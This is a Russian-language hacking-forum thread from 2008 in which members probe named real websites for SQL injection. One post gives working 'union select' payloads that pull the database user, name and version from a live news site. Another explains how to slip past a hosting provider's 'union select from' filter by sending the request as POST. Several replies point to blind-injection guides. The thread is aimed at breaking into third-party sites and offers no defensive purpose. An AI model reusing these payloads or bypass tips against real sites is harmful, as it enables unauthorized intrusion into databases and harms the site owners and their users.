HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3041  
Старый 22.08.2008, 17:49
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
По умолчанию

а вот это инекция http://rk-triada.ru/index.php?page=999??

И это http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=-999??

Последний раз редактировалось geforce; 22.08.2008 в 18:41..
 
Ответить с цитированием

  #3042  
Старый 22.08.2008, 19:01
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
С нами: 9450895

Репутация: 41
По умолчанию

Фильтрация, хороший сайт хорошая sql на нём) Но from фильтруется, Можно это кат-то обойти?

Есть подозрение на хостинг.

удалил

Последний раз редактировалось tor4); 22.08.2008 в 20:35..
 
Ответить с цитированием

  #3043  
Старый 22.08.2008, 19:40
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

tor4)
Это спейс веб, фильтрует не from, а последовательность union+select+from, обходится POST'ом

Последний раз редактировалось jokester; 22.08.2008 в 20:43..
 
Ответить с цитированием

  #3044  
Старый 22.08.2008, 22:19
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами: 9336002

Репутация: 204
По умолчанию

Цитата:
Сообщение от geforce  
а вот это инекция http://rk-triada.ru/index.php?page=999??

И это http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=-999??
Код:
http://rk-triada.ru/index.php?page=999-скорее всего есть,но это blind
http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=999-нет
 
Ответить с цитированием

  #3045  
Старый 23.08.2008, 01:35
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
Question

Цитата:
Сообщение от Shaitan-Devil  
Код:
http://rk-triada.ru/index.php?page=999-скорее всего есть,но это blind
http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=999-нет

А что значи blind???
 
Ответить с цитированием

  #3046  
Старый 23.08.2008, 01:38
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

Цитата:
Сообщение от geforce  
А что значи blind???
слепая скуля
 
Ответить с цитированием

  #3047  
Старый 23.08.2008, 03:05
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
По умолчанию

Цитата:
Сообщение от BlackSun  
слепая скуля
Подскажите как сней работать! Или дайте инфу?
 
Ответить с цитированием

  #3048  
Старый 23.08.2008, 03:31
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

Цитата:
Сообщение от geforce  
Подскажите как сней работать! Или дайте инфу?
https://forum.antichat.ru/thread35207.html
 
Ответить с цитированием

  #3049  
Старый 23.08.2008, 03:32
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами: 9420866

Репутация: 228
По умолчанию

Цитата:
Сообщение от geforce  
Подскажите как сней работать! Или дайте инфу?
Вот например
http://forum.antichat.ru/thread56221-blind+sql.html

Также на Ачате есть статья по blind inj
 
Ответить с цитированием

  #3050  
Старый 23.08.2008, 16:48
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами: 9457097

Репутация: 133
По умолчанию

хм столкнулся с такой проблемой есть скуль
Код:
http://www.stroyazbuka.com/news/index.php?idnews=9999999+and 1=1/*
количество столбцов подобраннно 13
при попытке вывести информацию о бд все нормально
Код:
http://www.stroyazbuka.com/news/index.php?idnews=99999999999+union+select+1,2,3,4,5,6,7,concat_ws(0x1,User(),Database(),Version()),9,10,11,12,13/*
а вот когда пытаюсь сделать Запрос в таблицу редирректит на
http://2.sweb.ru/insecure
Насколько я понимаю это фильрация которую делает хотинг ? и можно ли её обойти ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...